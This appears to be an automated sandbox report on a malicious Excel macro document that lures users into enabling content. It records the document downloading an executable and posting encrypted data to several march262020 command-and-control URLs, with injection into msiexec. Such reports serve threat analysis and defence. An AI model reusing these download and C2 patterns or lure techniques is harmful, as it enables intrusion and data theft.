Play interactive tour

Edit tour

Analysis Report EmergencyContact.xlsm

Overview

General Information

Joe Sandbox Version:	28.0.0 Lapis Lazuli
Analysis ID:	218575
Start date:	27.03.2020
Start time:	18:28:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	EmergencyContact.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSM@6/5@10/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 61.5% (good quality ratio 60.6%) Quality average: 87.2% Quality standard deviation: 20.6%
HCA Information:	Successful, ratio: 70% Number of executed functions: 75 Number of non-executed functions: 127
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Detection
Threshold	100	0 - 100		false

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification Spiderchart

Analysis Advice

Contains functionality to modify the execution of threads in other processes

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Execution through API2	Registry Run Keys / Startup Folder1	Access Token Manipulation1	Masquerading1	Credential Dumping	Virtualization/Sandbox Evasion1	Remote File Copy12	Data from Local System	Data Encrypted1	Standard Cryptographic Protocol1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Replication Through Removable Media	Exploitation for Client Execution33	Port Monitors	Process Injection412	Disabling Security Tools1	Network Sniffing	Process Discovery1	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Remote File Copy12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
External Remote Services	Graphical User Interface1	Accessibility Features	Path Interception	Software Packing2	Input Capture	Remote System Discovery1	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Drive-by Compromise	Scheduled Task	System Firmware	DLL Search Order Hijacking	Virtualization/Sandbox Evasion1	Credentials in Files	File and Directory Discovery1	Logon Scripts	Input Capture	Data Encrypted	Standard Application Layer Protocol123	SIM Card Swap		Premium SMS Toll Fraud
Exploit Public-Facing Application	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	Access Token Manipulation1	Account Manipulation	System Information Discovery13	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Spearphishing Link	Graphical User Interface	Modify Existing Service	New Service	Process Injection412	Brute Force	System Owner/User Discovery	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port	Jamming or Denial of Service		Abuse Accessibility Features
Spearphishing Attachment	Scripting	Path Interception	Scheduled Task	Obfuscated Files or Information2	Two-Factor Authentication Interception	Network Sniffing	Pass the Hash	Email Collection	Exfiltration Over Command and Control Channel	Uncommonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Signature Overview

Click to jump to signature section

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe

Jump to behavior

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe

Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax]	2_2_00428900
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then call 00419D40h	2_2_00423380
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then mov esi, eax	2_2_00424440
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then movzx edx, byte ptr [eax+esi]	2_2_00423C00
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_0041D660
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then cmp word ptr [eax], cx	2_2_00426E00
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then movzx ecx, byte ptr [eax]	2_2_0041EF50
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then cmp word ptr [eax], cx	2_2_003E7050
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_003DD8B0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then movzx ecx, byte ptr [eax]	2_2_003DF1A0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax]	2_2_003E8B50
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then call 003D9F90h	2_2_003E35D0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then movzx edx, byte ptr [eax+esi]	2_2_003E3E50
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 4x nop then mov esi, eax	2_2_003E4690
Source: C:\Windows\System32\msiexec.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax]	4_2_00098900
Source: C:\Windows\System32\msiexec.exe	Code function: 4x nop then call 00089D40h	4_2_00093380
Source: C:\Windows\System32\msiexec.exe	Code function: 4x nop then movzx edx, byte ptr [eax+esi]	4_2_00093C00
Source: C:\Windows\System32\msiexec.exe	Code function: 4x nop then mov esi, eax	4_2_00094440
Source: C:\Windows\System32\msiexec.exe	Code function: 4x nop then cmp word ptr [eax], cx	4_2_00096E00
Source: C:\Windows\System32\msiexec.exe	Code function: 4x nop then mov byte ptr [edi], bl	4_2_0008D660
Source: C:\Windows\System32\msiexec.exe	Code function: 4x nop then movzx ecx, byte ptr [eax]	4_2_0008EF50

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: march262020.club

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.2.2:49160 -> 170.106.11.8:80

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.2.2:49160 -> 170.106.11.8:80

Networking:

Found C&C like URL pattern

Show sources

Source: global traffic	HTTP traffic detected: POST /post.php HTTP/1.1Accept: /Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.clubContent-Length: 300Connection: CloseData Raw: 4f cd 84 d2 98 00 5b e9 f6 df 3a 88 34 f6 f1 c1 7a 48 4e 84 e8 8d d3 5b 6d 83 8e 85 a8 2e 7f 64 4a e0 c9 c6 98 59 d6 d6 3a 1f 59 d1 4c 75 2f 3a c1 90 a3 f3 f8 bd 4c 3d df 22 7b a1 44 86 d7 f1 40 67 37 24 a4 bf 67 28 7c 5e e7 cb cc 51 b6 7d 48 fc fa 51 8d e7 66 46 49 00 3c ef 79 17 bb e5 3f b3 26 7b 07 a2 58 86 55 16 36 26 85 fb 18 5e fc 3e a7 b1 2e 6f 9c a5 0d 65 2c 9e dd 97 68 ab 0c 3c 14 c3 43 1e f2 6c fe 4e 3d c4 aa 49 a8 cb 07 7d 6d f9 47 33 89 c7 41 6e bc 39 c9 4b 67 31 99 14 16 0a 5f 95 2c a1 e4 3e dd 3a 4f 75 eb b0 a7 49 e5 ae 64 cb b9 11 1d df 64 53 c1 af 8c a2 09 ea 46 32 86 5e d0 ef ed d5 d3 de 1b 22 0b 69 5f ef 58 5a b2 c7 04 19 ed 82 d9 a4 5d 86 94 21 8f a5 ba 04 e7 bf 3a 5e c0 ce 3f f6 3e 63 8a a8 72 b2 ba 92 b4 b4 60 f4 81 bc 32 1c 0d 57 19 94 92 39 4c ec ad 6d f8 27 71 08 b8 a9 c8 d2 33 b2 49 5c 5c f5 ce 9e 44 a5 1d f0 57 4f 0c 7c 52 be 3e cd 9a b5 6f 37 e7 a1 bb ae 00 c3 Data Ascii: O[:4zHN[m.dJY:YLu/:L="{D@g7$g(\|^Q}HQfFI<y?&{XU6&^>.oe,h<ClN=I}mG3An9Kg1_,>:OuIddSF2^"i_XZ]!:^?>cr`2W9Lm'q3I\\DWO\|R>o7
Source: global traffic	HTTP traffic detected: POST /post.php HTTP/1.1Accept: /Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.comContent-Length: 300Connection: CloseData Raw: 4f cd 84 d2 98 00 5b e9 f6 df 3a 88 34 f6 f1 c1 7a 48 4e 84 e8 8d d3 5b 6d 83 8e 85 a8 2e 7f 64 4a e0 c9 c6 98 59 d6 d6 3a 1f 59 d1 4c 75 2f 3a c1 90 a3 f3 f8 bd 4c 3d df 22 7b a1 44 86 d7 f1 40 67 37 24 a4 bf 67 28 7c 5e e7 cb cc 51 b6 7d 48 fc fa 51 8d e7 66 46 49 00 3c ef 79 17 bb e5 3f b3 26 7b 07 a2 58 86 55 16 36 26 85 fb 18 5e fc 3e a7 b1 2e 6f 9c a5 0d 65 2c 9e dd 97 68 ab 0c 3c 14 c3 43 1e f2 6c fe 4e 3d c4 aa 49 a8 cb 07 7d 6d f9 47 33 89 c7 41 6e bc 39 c9 4b 67 31 99 14 16 0a 5f 95 2c a1 e4 3e dd 3a 4f 75 eb b0 a7 49 e5 ae 64 cb b9 11 1d df 64 53 c1 af 8c a2 09 ea 46 32 86 5e d0 ef ed d5 d3 de 1b 22 0b 69 5f ef 58 5a b2 c7 04 19 ed 82 d9 a4 5d 86 94 21 8f a5 ba 04 e7 bf 3a 5e c0 ce 3f f6 3e 63 8a a8 72 b2 ba 92 b4 b4 60 f4 81 bc 32 1c 0d 57 19 94 92 39 4c ec ad 6d f8 27 71 08 b8 a9 c8 d2 33 b2 49 5c 5c f5 ce 9e 44 a5 1d f0 57 4f 0c 7c 52 be 3e cd 9a b5 6f 37 e7 a1 bb ae 00 c3 Data Ascii: O[:4zHN[m.dJY:YLu/:L="{D@g7$g(\|^Q}HQfFI<y?&{XU6&^>.oe,h<ClN=I}mG3An9Kg1_,>:OuIddSF2^"i_XZ]!:^?>cr`2W9Lm'q3I\\DWO\|R>o7

Downloads executable code via HTTP

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 27 Mar 2020 17:30:37 GMTContent-Type: application/octet-streamContent-Length: 245248Connection: keep-aliveLast-Modified: Fri, 27 Mar 2020 15:28:13 GMTETag: "3be00-5a1d7bfe43d40"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 c4 7b 9f dc a5 15 cc dc a5 15 cc dc a5 15 cc c2 f7 91 cc c3 a5 15 cc c2 f7 80 cc fd a5 15 cc c2 f7 96 cc 5d a5 15 cc fb 63 6e cc db a5 15 cc dc a5 14 cc 58 a5 15 cc c2 f7 9f cc dd a5 15 cc c2 f7 81 cc dd a5 15 cc c2 f7 84 cc dd a5 15 cc 52 69 63 68 dc a5 15 cc 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 87 c4 19 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 de 02 00 00 c0 0b 00 00 00 00 00 6c 2c 00 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 0e 00 00 04 00 00 f6 50 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 28 03 00 50 00 00 00 00 30 0e 00 40 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 02 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 80 dc 02 00 00 10 00 00 00 de 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 88 43 00 00 00 f0 02 00 00 44 00 00 00 e2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 48 ee 0a 00 00 40 03 00 00 1a 00 00 00 26 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 7c 00 00 00 30 0e 00 00 7e 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Internet Provider seen in connection with other malware

Show sources

Source: Joe Sandbox View	ASN Name: unknown unknown
Source: Joe Sandbox View	ASN Name: unknown unknown

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: GET /files/app.bin HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: march262020.clubConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /post.php HTTP/1.1Accept: /Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.clubContent-Length: 300Connection: CloseData Raw: 4f cd 84 d2 98 00 5b e9 f6 df 3a 88 34 f6 f1 c1 7a 48 4e 84 e8 8d d3 5b 6d 83 8e 85 a8 2e 7f 64 4a e0 c9 c6 98 59 d6 d6 3a 1f 59 d1 4c 75 2f 3a c1 90 a3 f3 f8 bd 4c 3d df 22 7b a1 44 86 d7 f1 40 67 37 24 a4 bf 67 28 7c 5e e7 cb cc 51 b6 7d 48 fc fa 51 8d e7 66 46 49 00 3c ef 79 17 bb e5 3f b3 26 7b 07 a2 58 86 55 16 36 26 85 fb 18 5e fc 3e a7 b1 2e 6f 9c a5 0d 65 2c 9e dd 97 68 ab 0c 3c 14 c3 43 1e f2 6c fe 4e 3d c4 aa 49 a8 cb 07 7d 6d f9 47 33 89 c7 41 6e bc 39 c9 4b 67 31 99 14 16 0a 5f 95 2c a1 e4 3e dd 3a 4f 75 eb b0 a7 49 e5 ae 64 cb b9 11 1d df 64 53 c1 af 8c a2 09 ea 46 32 86 5e d0 ef ed d5 d3 de 1b 22 0b 69 5f ef 58 5a b2 c7 04 19 ed 82 d9 a4 5d 86 94 21 8f a5 ba 04 e7 bf 3a 5e c0 ce 3f f6 3e 63 8a a8 72 b2 ba 92 b4 b4 60 f4 81 bc 32 1c 0d 57 19 94 92 39 4c ec ad 6d f8 27 71 08 b8 a9 c8 d2 33 b2 49 5c 5c f5 ce 9e 44 a5 1d f0 57 4f 0c 7c 52 be 3e cd 9a b5 6f 37 e7 a1 bb ae 00 c3 Data Ascii: O[:4zHN[m.dJY:YLu/:L="{D@g7$g(\|^Q}HQfFI<y?&{XU6&^>.oe,h<ClN=I}mG3An9Kg1_,>:OuIddSF2^"i_XZ]!:^?>cr`2W9Lm'q3I\\DWO\|R>o7
Source: global traffic	HTTP traffic detected: POST /post.php HTTP/1.1Accept: /Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.comContent-Length: 300Connection: CloseData Raw: 4f cd 84 d2 98 00 5b e9 f6 df 3a 88 34 f6 f1 c1 7a 48 4e 84 e8 8d d3 5b 6d 83 8e 85 a8 2e 7f 64 4a e0 c9 c6 98 59 d6 d6 3a 1f 59 d1 4c 75 2f 3a c1 90 a3 f3 f8 bd 4c 3d df 22 7b a1 44 86 d7 f1 40 67 37 24 a4 bf 67 28 7c 5e e7 cb cc 51 b6 7d 48 fc fa 51 8d e7 66 46 49 00 3c ef 79 17 bb e5 3f b3 26 7b 07 a2 58 86 55 16 36 26 85 fb 18 5e fc 3e a7 b1 2e 6f 9c a5 0d 65 2c 9e dd 97 68 ab 0c 3c 14 c3 43 1e f2 6c fe 4e 3d c4 aa 49 a8 cb 07 7d 6d f9 47 33 89 c7 41 6e bc 39 c9 4b 67 31 99 14 16 0a 5f 95 2c a1 e4 3e dd 3a 4f 75 eb b0 a7 49 e5 ae 64 cb b9 11 1d df 64 53 c1 af 8c a2 09 ea 46 32 86 5e d0 ef ed d5 d3 de 1b 22 0b 69 5f ef 58 5a b2 c7 04 19 ed 82 d9 a4 5d 86 94 21 8f a5 ba 04 e7 bf 3a 5e c0 ce 3f f6 3e 63 8a a8 72 b2 ba 92 b4 b4 60 f4 81 bc 32 1c 0d 57 19 94 92 39 4c ec ad 6d f8 27 71 08 b8 a9 c8 d2 33 b2 49 5c 5c f5 ce 9e 44 a5 1d f0 57 4f 0c 7c 52 be 3e cd 9a b5 6f 37 e7 a1 bb ae 00 c3 Data Ascii: O[:4zHN[m.dJY:YLu/:L="{D@g7$g(\|^Q}HQfFI<y?&{XU6&^>.oe,h<ClN=I}mG3An9Kg1_,>:OuIddSF2^"i_XZ]!:^?>cr`2W9Lm'q3I\\DWO\|R>o7

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8C257964.jpeg

Jump to behavior

Downloads files from webservers via HTTP

Show sources

Source: global traffic

HTTP traffic detected: GET /files/app.bin HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: march262020.clubConnection: Keep-Alive

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: march262020.club

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /post.php HTTP/1.1Accept: */*Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.clubContent-Length: 300Connection: CloseData Raw: 4f cd 84 d2 98 00 5b e9 f6 df 3a 88 34 f6 f1 c1 7a 48 4e 84 e8 8d d3 5b 6d 83 8e 85 a8 2e 7f 64 4a e0 c9 c6 98 59 d6 d6 3a 1f 59 d1 4c 75 2f 3a c1 90 a3 f3 f8 bd 4c 3d df 22 7b a1 44 86 d7 f1 40 67 37 24 a4 bf 67 28 7c 5e e7 cb cc 51 b6 7d 48 fc fa 51 8d e7 66 46 49 00 3c ef 79 17 bb e5 3f b3 26 7b 07 a2 58 86 55 16 36 26 85 fb 18 5e fc 3e a7 b1 2e 6f 9c a5 0d 65 2c 9e dd 97 68 ab 0c 3c 14 c3 43 1e f2 6c fe 4e 3d c4 aa 49 a8 cb 07 7d 6d f9 47 33 89 c7 41 6e bc 39 c9 4b 67 31 99 14 16 0a 5f 95 2c a1 e4 3e dd 3a 4f 75 eb b0 a7 49 e5 ae 64 cb b9 11 1d df 64 53 c1 af 8c a2 09 ea 46 32 86 5e d0 ef ed d5 d3 de 1b 22 0b 69 5f ef 58 5a b2 c7 04 19 ed 82 d9 a4 5d 86 94 21 8f a5 ba 04 e7 bf 3a 5e c0 ce 3f f6 3e 63 8a a8 72 b2 ba 92 b4 b4 60 f4 81 bc 32 1c 0d 57 19 94 92 39 4c ec ad 6d f8 27 71 08 b8 a9 c8 d2 33 b2 49 5c 5c f5 ce 9e 44 a5 1d f0 57 4f 0c 7c 52 be 3e cd 9a b5 6f 37 e7 a1 bb ae 00 c3 Data Ascii: O[:4zHN[m.dJY:YLu/:L="{D@g7$g(|^Q}HQfFI<y?&{XU6&^>.oe,h<ClN=I}mG3An9Kg1_,>:OuIddSF2^"i_XZ]!:^?>cr`2W9Lm'q3I\\DWO|R>o7

Urls found in memory or binary data

Show sources

Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://march262020.best/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://march262020.club/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://march262020.com/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://march262020.live/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://march262020.live/post.phpU
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://march262020.live/post.phpcs
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://march262020.network/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://march262020.online/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://march262020.site/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://march262020.store/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://march262020.tech/post.php
Source: msiexec.exe, 00000004.00000002.1503895928.0051B000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://www.march262020.live/post.php
Source: msiexec.exe, 00000004.00000002.1503895928.0051B000.00000004.00000020.sdmp	String found in binary or memory: http://www.march262020.live/post.php-
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://www.march262020.live/post.phpAS
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp	String found in binary or memory: http://www.march262020.live/post.phph

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing" and then "Enable Content' on the yelbw bar above to display the content. 18 19 D
Source: Screenshot number: 4	Screenshot OCR: PROTECTED DOCUMENT ' I 6 7 : , CANTVEIWTHE CONTENT? &EAQ1HEMQWSIEES 10 11 1. Openthe documenti
Source: Screenshot number: 4	Screenshot OCR: Enable Content' on the yelbw bar above to display the content. 18 19 D CI Cl 20 21 22 23 24
Source: Document image extraction number: 0	Screenshot OCR: Enable Editing" and then "Enable Content" on the yellow bar above to displaythe content.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. 2. Use a Desktop or Laptop. Protected documentdo notwork on mobile phones ort
Source: Document image extraction number: 0	Screenshot OCR: Enable Content" on the yellow bar above to displaythe content.
Source: Document image extraction number: 1	Screenshot OCR: PROTECTED DOCUMENT cANryE[!utiEm!yIE!ylzmc!IHEmQwsTEps I. Openthe document in Microsoft Office. P
Source: Document image extraction number: 1	Screenshot OCR: Enable ContenT on the yellow bar above to display the content.

Detected potential crypto function

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_0040ABC0	2_2_0040ABC0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_004034A0	2_2_004034A0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_0040A7E0	2_2_0040A7E0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_003CAA30	2_2_003CAA30
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_003CAE10	2_2_003CAE10
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe	Code function: 2_2_003C36F0	2_2_003C36F0
Source: C:\Windows\System32\msiexec.exe	Code function: 4_2_0007ABC0	4_2_0007ABC0
Source: C:\Windows\System32\msiexec.exe	Code function: 4_2_000734A0	4_2_000734A0
Source: C:\Windows\System32\msiexec.exe	Code function: 4_2_0007A7E0	4_2_0007A7E0

Classification label

Show sources

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@6/5@10/2

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Windows\System32\msiexec.exe

Code function: 4_2_00092080 AdjustTokenPrivileges,CloseHandle,

4_2_00092080

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$EmergencyContact.xlsm

Jump to behavior

Creates mutexes

Show sources

Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\{63BC39C8-1AFC-D9E5-83D4-5C1F23358D0A}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\{F32D0B54-2860-4974-83D4-5C1F23358D0A}
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\{43C409C8-2AFC-F99D-83D4-5C1F23358D0A}

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR1215.tmp

Jump to behavior

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Show sources

Source: C:\Windows\System32\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe 'C:\cYNhYPc\mVVJuWs\FTBSEIi.exe'
Source: unknown	Process created: C:\Windows\System32\msiexec.exe msiexec.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Imed\tufi.exe 'C:\Users\user\AppData\Roaming\Imed\tufi.exe'
